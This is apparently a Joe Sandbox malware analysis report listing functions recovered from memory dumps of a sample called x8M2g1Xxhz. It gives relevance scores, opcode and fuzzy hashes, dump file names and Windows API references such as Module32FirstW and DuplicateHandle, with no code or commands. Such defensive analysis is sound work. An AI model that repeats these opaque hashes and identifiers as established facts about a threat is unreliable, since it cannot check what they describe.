Opcode ID: 1c9680faf34ec0a821c60ddcfd6908ca51d1d91f7574593beb9255ac82d5b29e
Instruction ID: e6ef1df931691efc10813424f084ae1109f530cd7351fa83025cdf02c4a890af
Opcode Fuzzy Hash: 1c9680faf34ec0a821c60ddcfd6908ca51d1d91f7574593beb9255ac82d5b29e
Instruction Fuzzy Hash: 86919DFB34D222BDB152D4452B54AFB176EE5D6730730883AF807D6946F2982E4B7071

Function 0466025A Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 462COMMON

Download Yara Rule

Strings

`, xrefs: 046602F6
`, xrefs: 04660839

Memory Dump Source

Source File: 00000000.00000002.3796950780.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4660000_x8M2g1Xxhz.jbxd

Similarity

API ID:
String ID: `$`
API String ID: 0-3752478910
Opcode ID: 2c6c1298b60e51ffdf0624f08920ee6cd3a8b442f022fe7fd44fef91acb70eb3
Instruction ID: 42df3336e8f763afa17e77ef44660ffbeb85a4290893f476b307fc85367d7144
Opcode Fuzzy Hash: 2c6c1298b60e51ffdf0624f08920ee6cd3a8b442f022fe7fd44fef91acb70eb3
Instruction Fuzzy Hash: BE919DFB34D221BD7152D4452B64AFB176EE6D6730730883AF807D6942F2982E4B6076

Function 04660281 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 449COMMON

Download Yara Rule

Strings

`, xrefs: 046602F6
`, xrefs: 04660839

Memory Dump Source

Source File: 00000000.00000002.3796950780.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4660000_x8M2g1Xxhz.jbxd

Similarity

API ID:
String ID: `$`
API String ID: 0-3752478910
Opcode ID: 9f1681cb32acc064ada57ffe29a5a887fcb9b820e04a7fc90f164e3c0bcbffda
Instruction ID: a82f58e6846786e7e5d05efea28780e15a3b8eab9fab0eb9222c62466cf73f54
Opcode Fuzzy Hash: 9f1681cb32acc064ada57ffe29a5a887fcb9b820e04a7fc90f164e3c0bcbffda
Instruction Fuzzy Hash: BD81ACFB34D222BD7152D4452B14AFB176EE6D6730730883AF807D6942F3982E4B6076

Function 04660294 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 449COMMON

Download Yara Rule

Strings

`, xrefs: 046602F6
`, xrefs: 04660839

Memory Dump Source

Source File: 00000000.00000002.3796950780.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4660000_x8M2g1Xxhz.jbxd

Similarity

API ID:
String ID: `$`
API String ID: 0-3752478910
Opcode ID: 22c62e8a86f1c67efa1cce6194c5d11a94f0f7316d29fa1b883da20f2b1de979
Instruction ID: ce180ca9835352aea18d2cf8108f0557bb1648d8ed30de2123b7df3538278e5e
Opcode Fuzzy Hash: 22c62e8a86f1c67efa1cce6194c5d11a94f0f7316d29fa1b883da20f2b1de979
Instruction Fuzzy Hash: 9581CFFB34D222BD7152D4452B24AFB576EE6D6730730883AF807D6942F3882E4B6076

Function 046602B0 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 443COMMON

Download Yara Rule

Strings

`, xrefs: 046602F6
`, xrefs: 04660839

Memory Dump Source

Source File: 00000000.00000002.3796950780.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4660000_x8M2g1Xxhz.jbxd

Similarity

API ID:
String ID: `$`
API String ID: 0-3752478910
Opcode ID: 4c19d8e1a2ac77648bb8e675fb648a6a180a784cd278d1f0cd4f335d6366b782
Instruction ID: 63a7c331b41853b4083e5b8e8b52f8218732e7bec95560ea76170b25dba91073
Opcode Fuzzy Hash: 4c19d8e1a2ac77648bb8e675fb648a6a180a784cd278d1f0cd4f335d6366b782
Instruction Fuzzy Hash: 1281ADFB34D221BDB152D5452B10AFB276EE6D6730730883AF807D6942F3982E4B6076

Function 04660323 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 429COMMON

Download Yara Rule

Strings

`, xrefs: 046602F6
`, xrefs: 04660839

Memory Dump Source

Source File: 00000000.00000002.3796950780.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4660000_x8M2g1Xxhz.jbxd

Similarity

API ID:
String ID: `$`
API String ID: 0-3752478910
Opcode ID: 3b9ae896abb57d7768929309a063f73fe15d1cf00f43b97e1abb55f978084d76
Instruction ID: 29a5110e149776baee8110dfe2ede42a14a57761dafca5e194b7eebc0e2bcd05
Opcode Fuzzy Hash: 3b9ae896abb57d7768929309a063f73fe15d1cf00f43b97e1abb55f978084d76
Instruction Fuzzy Hash: 6E81AEFB34D221BD7112D4456B54AFB276EE6D6730730883AF807D6942F2892E4B6076

Function 046602E9 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 427COMMON

Download Yara Rule

Strings

`, xrefs: 046602F6
`, xrefs: 04660839

Memory Dump Source

Source File: 00000000.00000002.3796950780.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4660000_x8M2g1Xxhz.jbxd

Similarity

API ID:
String ID: `$`
API String ID: 0-3752478910
Opcode ID: 80dbca1709e1e81acb2b62917010dbb42b01b503b133669fd9308efdc0bcc34a
Instruction ID: 4394b2eb61d64a8f15d7c54b60e7b367484e6bbdb3da13a9cd2a399ca40149be
Opcode Fuzzy Hash: 80dbca1709e1e81acb2b62917010dbb42b01b503b133669fd9308efdc0bcc34a
Instruction Fuzzy Hash: 0B81AEFB34D222BD7152D4452F64AFB176EE6D6730730883AF807D6942F2892E4B6076

Function 046602D3 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 427COMMON

Download Yara Rule

Strings

`, xrefs: 046602F6
`, xrefs: 04660839

Memory Dump Source

Source File: 00000000.00000002.3796950780.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4660000_x8M2g1Xxhz.jbxd

Similarity

API ID:
String ID: `$`
API String ID: 0-3752478910
Opcode ID: 2effb1d50a0f546d97413ddbcd2c0cfe39ceb9100c8e2464b32bb07b61750e9f
Instruction ID: b213966c1604bf182dd59f2e9ea9afe8c77b9eb0a5322d7d907fe8a416a69f8d
Opcode Fuzzy Hash: 2effb1d50a0f546d97413ddbcd2c0cfe39ceb9100c8e2464b32bb07b61750e9f
Instruction Fuzzy Hash: EC81CFFB34D221BDB112D4412B10AFB176EE6D6730730883AF807D6942F3982E4B6072

Function 0040AF66 Relevance: 4.5, APIs: 3, Instructions: 34COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 0040AF80

Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001), ref: 0040B8C4

std::bad_alloc::bad_alloc.LIBCMT ref: 0040AFA3

Part of subcall function 0040AEFC: std::exception::exception.LIBCMT ref: 0040AF08

std::bad_exception::bad_exception.LIBCMT ref: 0040AFB7

Memory Dump Source

Source File: 00000000.00000002.3792366029.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3792335417.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3792522579.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3792522579.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3792566680.0000000000436000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3792587566.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3792608478.0000000000438000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3792632976.0000000000444000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3792754378.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3792780192.00000000005A0000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3792843360.00000000005B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3792866015.00000000005B2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3792898640.00000000005B4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3792898640.00000000005BF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3792954136.00000000005C1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3792977182.00000000005C6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3792998531.00000000005C8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3793017539.00000000005C9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3793041135.00000000005D9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3793060447.00000000005DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3793083731.00000000005DB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3793102880.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3793128931.00000000005F4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3793147536.00000000005F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3793169552.00000000005FD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3793191693.0000000000606000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3793216344.000000000061D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3793236834.000000000061F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3793262916.0000000000636000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3793284193.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3793317418.000000000064B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3793338816.000000000064C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3793338816.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3793407994.00000000006B7000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_x8M2g1Xxhz.jbxd

Similarity

API ID: AllocateHeap_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
String ID:
API String ID: 832318072-0
Opcode ID: 248d97f5b0d58b32bb2c6dfd0cee56c1e8c558e55d5e2921fa5105a46d33be9f
Instruction ID: 8b9ae61c6da4be1dff3a05d3864a1109474d1d20ea1a05e38be312cad591667e
Opcode Fuzzy Hash: 248d97f5b0d58b32bb2c6dfd0cee56c1e8c558e55d5e2921fa5105a46d33be9f
Instruction Fuzzy Hash: 67F0BE21A0030662CA15BB61EC06D8E3B688F4031CB6000BFE811761D2CFBCEA55859E

Function 0466030C Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 416COMMON

Download Yara Rule

APIs

Module32FirstW.KERNEL32(00000058,00000058), ref: 04660482

Strings

`, xrefs: 04660839

Memory Dump Source

Source File: 00000000.00000002.3796950780.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4660000_x8M2g1Xxhz.jbxd

Similarity

API ID: FirstModule32
String ID: `
API String ID: 3757679902-934871106
Opcode ID: b60e386b98bd7b0fc82f41c8633a0ff849c3469912e7a20d28be5a9d66982957
Instruction ID: 4c935294a99d423f29db8d18c9a4f905b556a48d22cd586af220a1bbff567f32
Opcode Fuzzy Hash: b60e386b98bd7b0fc82f41c8633a0ff849c3469912e7a20d28be5a9d66982957
Instruction Fuzzy Hash: 51718CFB34D221BDB152D4452F64AFB176EE2D6730730883AF807D6942F2992E4B6076

Function 0466033B Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 404COMMON

Download Yara Rule

APIs

Module32FirstW.KERNEL32(00000058,00000058), ref: 04660482

Strings

`, xrefs: 04660839

Memory Dump Source

Source File: 00000000.00000002.3796950780.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4660000_x8M2g1Xxhz.jbxd

Similarity

API ID: FirstModule32
String ID: `
API String ID: 3757679902-934871106
Opcode ID: e51af6af403f774400fd47fed7aaa8bd501b5a92db7d4ac9be9befd2449245f7
Instruction ID: b11d7b888e530bb8c76d71530eca66e802edbe281c7bfac2784f30db8b3b7b2d
Opcode Fuzzy Hash: e51af6af403f774400fd47fed7aaa8bd501b5a92db7d4ac9be9befd2449245f7
Instruction Fuzzy Hash: 3C718BFB34D221BDB152D4412F64AFB176EE6D6730730883AF807D6942F2892E4B6076

Function 0466034E Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 400COMMON

Download Yara Rule

APIs

Module32FirstW.KERNEL32(00000058,00000058), ref: 04660482

Strings

`, xrefs: 04660839

Memory Dump Source

Source File: 00000000.00000002.3796950780.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4660000_x8M2g1Xxhz.jbxd

Similarity

API ID: FirstModule32
String ID: `
API String ID: 3757679902-934871106
Opcode ID: 1186f08f600ef3c688541601d340089172c53a311ec78f28815c692d244877d3
Instruction ID: 9a623774519b8c635748d6171d98e134478539837a82ba297f0f0578de367ab4
Opcode Fuzzy Hash: 1186f08f600ef3c688541601d340089172c53a311ec78f28815c692d244877d3
Instruction Fuzzy Hash: 9E718BFB34D221BD7112D4412F64AFB576EE2D6730730883AF807D6942F2882E4B6076

Function 0466037C Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 387COMMON

Download Yara Rule

APIs

Module32FirstW.KERNEL32(00000058,00000058), ref: 04660482

Strings

`, xrefs: 04660839

Memory Dump Source

Source File: 00000000.00000002.3796950780.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4660000_x8M2g1Xxhz.jbxd

Similarity

API ID: FirstModule32
String ID: `
API String ID: 3757679902-934871106
Opcode ID: 8f1fef081b33c38f74a83e00fec4e516a17dab4ade9f6f4041b000f278384f62
Instruction ID: 7fe4812f89cdaca42903602530788cbe939330a506d292bd694ef16b044d5825
Opcode Fuzzy Hash: 8f1fef081b33c38f74a83e00fec4e516a17dab4ade9f6f4041b000f278384f62
Instruction Fuzzy Hash: 8B7167FB34D221BD7152D0422F64AFB176EE2D6730730883AF807D6942F2892E4B6076

Function 0466039C Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 375COMMON

Download Yara Rule

APIs

Module32FirstW.KERNEL32(00000058,00000058), ref: 04660482

Strings

`, xrefs: 04660839

Memory Dump Source

Source File: 00000000.00000002.3796950780.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4660000_x8M2g1Xxhz.jbxd

Similarity

API ID: FirstModule32
String ID: `
API String ID: 3757679902-934871106
Opcode ID: 3c16b20afc28609291100cbadb0b61c5fa844756564acae581d3b913b17dee0d
Instruction ID: cbcbd245f58ded4ee2cacb6f05be6930314f1617fce5f85229b454742b8393fb
Opcode Fuzzy Hash: 3c16b20afc28609291100cbadb0b61c5fa844756564acae581d3b913b17dee0d
Instruction Fuzzy Hash: B9616AFB34D221BC7152D4462F64AFB176EE2D6730730883AF807D6946F2892E4B2076

Function 046603AD Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 374COMMON

Download Yara Rule

APIs

Module32FirstW.KERNEL32(00000058,00000058), ref: 04660482

Strings

`, xrefs: 04660839

Memory Dump Source

Source File: 00000000.00000002.3796950780.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4660000_x8M2g1Xxhz.jbxd

Similarity

API ID: FirstModule32
String ID: `
API String ID: 3757679902-934871106
Opcode ID: c5e0afd85f7af8371250d560952b8da1aa76d6373be25f4691b6471c765b0a54
Instruction ID: 4ecd6683678d229c32f7bd1c791e644f404dac22c37ebabb8f75778152a9fcc6
Opcode Fuzzy Hash: c5e0afd85f7af8371250d560952b8da1aa76d6373be25f4691b6471c765b0a54
Instruction Fuzzy Hash: 796168FB34D221BDB112D4412F64AFB176EE6D6730330883AF807D6946F2892E4B2076

Function 0466042F Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 371COMMON

Download Yara Rule

APIs

Module32FirstW.KERNEL32(00000058,00000058), ref: 04660482

Strings

`, xrefs: 04660839

Memory Dump Source

Source File: 00000000.00000002.3796950780.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4660000_x8M2g1Xxhz.jbxd

Similarity

API ID: FirstModule32
String ID: `
API String ID: 3757679902-934871106
Opcode ID: 0a94017124def620839e15b999502b249d319e47bd19539da18a0fe5f5caadcb
Instruction ID: e10a70e8916ce0b6a1de1e28b362671367c390663d8acbf9a52cee9637c91836
Opcode Fuzzy Hash: 0a94017124def620839e15b999502b249d319e47bd19539da18a0fe5f5caadcb
Instruction Fuzzy Hash: DF6169FB34D221BC7112D0462B64AFB576EE6D6730730883BF807D6946F2892E4B2076

Function 046603C6 Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 368COMMON

Download Yara Rule

APIs

Module32FirstW.KERNEL32(00000058,00000058), ref: 04660482

Strings

`, xrefs: 04660839

Memory Dump Source

Source File: 00000000.00000002.3796950780.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4660000_x8M2g1Xxhz.jbxd

Similarity

API ID: FirstModule32
String ID: `
API String ID: 3757679902-934871106
Opcode ID: 85b7d8efd9775c2391e0f416a41e8eda221dfdc4e3e4be6c0046af9261f379da
Instruction ID: bdaa386150606b7eed7a2f9325a94b5892cf28475aaf4cc7aa96a4fa08bfaca1
Opcode Fuzzy Hash: 85b7d8efd9775c2391e0f416a41e8eda221dfdc4e3e4be6c0046af9261f379da
Instruction Fuzzy Hash: 346168EB34C221BD7112D0462F64AFB576EE6D6730730883AF807D6946F2892E4B6076

Function 046603E5 Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 357COMMON

Download Yara Rule

APIs

Module32FirstW.KERNEL32(00000058,00000058), ref: 04660482

Strings

`, xrefs: 04660839

Memory Dump Source

Source File: 00000000.00000002.3796950780.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4660000_x8M2g1Xxhz.jbxd

Similarity

API ID: FirstModule32
String ID: `
API String ID: 3757679902-934871106
Opcode ID: 48070f374e396048205a581b99c3192262c60ec6cd00aae38f3a53b9ad3a0ff3
Instruction ID: 01dcd7f33162c0919c21d77b7d16128ad0cabd744465673c42002f4c28edd27b
Opcode Fuzzy Hash: 48070f374e396048205a581b99c3192262c60ec6cd00aae38f3a53b9ad3a0ff3
Instruction Fuzzy Hash: AF617BFB34D221BD7152D4416B60AFB276EE6D6730730883BF807D6946F2892E4B6076

Function 0466040B Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 337COMMON

Download Yara Rule

APIs

Module32FirstW.KERNEL32(00000058,00000058), ref: 04660482

Strings

`, xrefs: 04660839

Memory Dump Source

Source File: 00000000.00000002.3796950780.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4660000_x8M2g1Xxhz.jbxd

Similarity

API ID: FirstModule32
String ID: `
API String ID: 3757679902-934871106
Opcode ID: ae060f3bee209d25ff5158a4328e199fb63da769731f5c94e3faf7ea66be1451
Instruction ID: 5b8023fb20227254946c35dea4add599865b3e76a684fb1ee958fa2b2426f487
Opcode Fuzzy Hash: ae060f3bee209d25ff5158a4328e199fb63da769731f5c94e3faf7ea66be1451
Instruction Fuzzy Hash: 15518EEB34D221BCB152D0412F54AFB276EE6D6730730883AF807D6942F3892E4B6076

Function 04660464 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 331COMMON

Download Yara Rule

APIs

Module32FirstW.KERNEL32(00000058,00000058), ref: 04660482

Strings

`, xrefs: 04660839

Memory Dump Source

Source File: 00000000.00000002.3796950780.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4660000_x8M2g1Xxhz.jbxd

Similarity

API ID: FirstModule32
String ID: `
API String ID: 3757679902-934871106
Opcode ID: e2260d3e2884bbbd0fbe8041760401b59b2860f2f3fa48c51b66bb7c99696d61
Instruction ID: 6ce9fb8e13ad8c2c54356a7d8f67bc5cccd4a8b5ea43f4d73f3cb375e5f63bbd
Opcode Fuzzy Hash: e2260d3e2884bbbd0fbe8041760401b59b2860f2f3fa48c51b66bb7c99696d61
Instruction Fuzzy Hash: 0B519DEB34D221BC7152D4452F64AFB176EE2D6730730883AF807D6946F3892E4B6076

Function 0466044B Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 313COMMON

Download Yara Rule

APIs

Module32FirstW.KERNEL32(00000058,00000058), ref: 04660482

Strings

`, xrefs: 04660839

Memory Dump Source

Source File: 00000000.00000002.3796950780.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4660000_x8M2g1Xxhz.jbxd

Similarity

API ID: FirstModule32
String ID: `
API String ID: 3757679902-934871106
Opcode ID: 8a49117772fdd797c1fe6516f73e70001e5c45cb203180eab94e045c77e8708c
Instruction ID: 2c8dfc93350560f26b7d5b8c393c21700ba6514a7dd941e8f639d4abf163816b
Opcode Fuzzy Hash: 8a49117772fdd797c1fe6516f73e70001e5c45cb203180eab94e045c77e8708c
Instruction Fuzzy Hash: F151A1F730D221BDB152D4456B60AFB176EE6D6730730883BF807D6946F2892E4B6076

Function 04711190 Relevance: 1.8, Strings: 1, Instructions: 548COMMON

Download Yara Rule

Strings

U, xrefs: 0471119D

Memory Dump Source

Source File: 00000000.00000002.3797118005.0000000004710000.00000040.00000800.00020000.00000000.sdmp, Offset: 04710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4710000_x8M2g1Xxhz.jbxd

Similarity

API ID:
String ID: U
API String ID: 0-3372436214
Opcode ID: aefdcb09bfdbc09ff2cd64af6d0764ae9b2bf7f2c3b0cd564f5bfafa5809c3ac
Instruction ID: 6602db311879cfdfa40b168871a102bba000129f0ac5277a2da458c9a72a15df
Opcode Fuzzy Hash: aefdcb09bfdbc09ff2cd64af6d0764ae9b2bf7f2c3b0cd564f5bfafa5809c3ac
Instruction Fuzzy Hash: 7052C2749113198FDB68EF64E995BDDBBB1FB48301F0081A9E50AA7351DB346E81CF81

Function 08E568C4 Relevance: 1.6, APIs: 1, Instructions: 122COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 08E569E2

Memory Dump Source

Source File: 00000000.00000002.3802283858.0000000008E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e50000_x8M2g1Xxhz.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 0f636d8764c79dbb2697acf80f92626f469747173359cef0614d7669467287d5
Instruction ID: 8447f885707dcee06f370c6b99979e0610ced70e0c9e069fef640d32e551c8f4
Opcode Fuzzy Hash: 0f636d8764c79dbb2697acf80f92626f469747173359cef0614d7669467287d5
Instruction Fuzzy Hash: 6151E2B1C103499FDB14CFA9C880ADEBFF5BF48310F64822AE819AB210D7749945CF90

Function 08E568D0 Relevance: 1.6, APIs: 1, Instructions: 113COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 08E569E2

Memory Dump Source

Source File: 00000000.00000002.3802283858.0000000008E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e50000_x8M2g1Xxhz.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 7ba931ebbcc503927936879c81d2f287a3799451349b815a7753e58d78fcd1ac
Instruction ID: 681f317c73068cda72e6cb3007d3b5569980ed018d199b388837dc767317fefd
Opcode Fuzzy Hash: 7ba931ebbcc503927936879c81d2f287a3799451349b815a7753e58d78fcd1ac
Instruction Fuzzy Hash: B241C0B1D103499FDB14CFAAC984ADEBBF5BF48314F64822AE818AB210D7759945CF90

Function 08E53EA4 Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 08E590E1

Memory Dump Source

Source File: 00000000.00000002.3802283858.0000000008E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e50000_x8M2g1Xxhz.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: 582411748a642ec0e1ec1bee2dab74ac9e305c361c4645664a434fef7a7b5c62
Instruction ID: 35f9e411f455c0b350a7aae3997dc29b3b23085a35aae1b02b76b59e2b1c8b57
Opcode Fuzzy Hash: 582411748a642ec0e1ec1bee2dab74ac9e305c361c4645664a434fef7a7b5c62
Instruction Fuzzy Hash: 604149B5900205CFCB14DF99D888BAAFBF5FB89314F24C859D919AB361D375A841CFA0

Function 085FC910 Relevance: 1.6, APIs: 1, Instructions: 93COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3802046786.00000000085F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_85f0000_x8M2g1Xxhz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c97063a484c31d1e2651a0f33d5dd4a81b6eab1d36bd408c8837905b2766c91
Instruction ID: 48b5085a65eaf5cf75537e2a7d78dad858f03c96f1ab1d7c3dea228a299379af
Opcode Fuzzy Hash: 4c97063a484c31d1e2651a0f33d5dd4a81b6eab1d36bd408c8837905b2766c91
Instruction Fuzzy Hash: C6314876900258DFDB01CF99D844ADEBFF6FB88310F14806AEA54A7361C335A954DFA0

Function 085FC980 Relevance: 1.6, APIs: 1, Instructions: 67COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 085FCA0F

Memory Dump Source

Source File: 00000000.00000002.3802046786.00000000085F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_85f0000_x8M2g1Xxhz.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: e57c49bd7831b2ca536d15ba7302f4bca9d5ffda90230119b32de23800f32138
Instruction ID: d7cf2cdb0ed9ade2b9045fb7ef70f5c5acacae77b5f89fe19cc18eeb305755f2
Opcode Fuzzy Hash: e57c49bd7831b2ca536d15ba7302f4bca9d5ffda90230119b32de23800f32138
Instruction Fuzzy Hash: 922136B5D002489FDB10CFA9D884AEEFBF4FB48310F10802AE954A3350C374A944CFA5

Function 0830977F Relevance: 1.6, APIs: 1, Instructions: 62libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(00000000), ref: 083098C1

Memory Dump Source

Source File: 00000000.00000002.3801680368.0000000008300000.00000040.00000800.00020000.00000000.sdmp, Offset: 08300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8300000_x8M2g1Xxhz.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a866394d17b0d27a39f93194e90205a97e158dff7575c1c0bb40f998c176ba79
Instruction ID: fe2a4b693b1274bbba475e0bca1fd3ba77663f6d621f5f1b744bd631601332f1
Opcode Fuzzy Hash: a866394d17b0d27a39f93194e90205a97e158dff7575c1c0bb40f998c176ba79
Instruction Fuzzy Hash: 5E116D74E012188FDB04DFACD494BADBBB5BBC8315F548165EC44A7382E731A942CF20

Function 085FC988 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 085FCA0F

Memory Dump Source

Source File: 00000000.00000002.3802046786.00000000085F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085F0000, based on PE: false

Joe Sandbox IDA Plugin

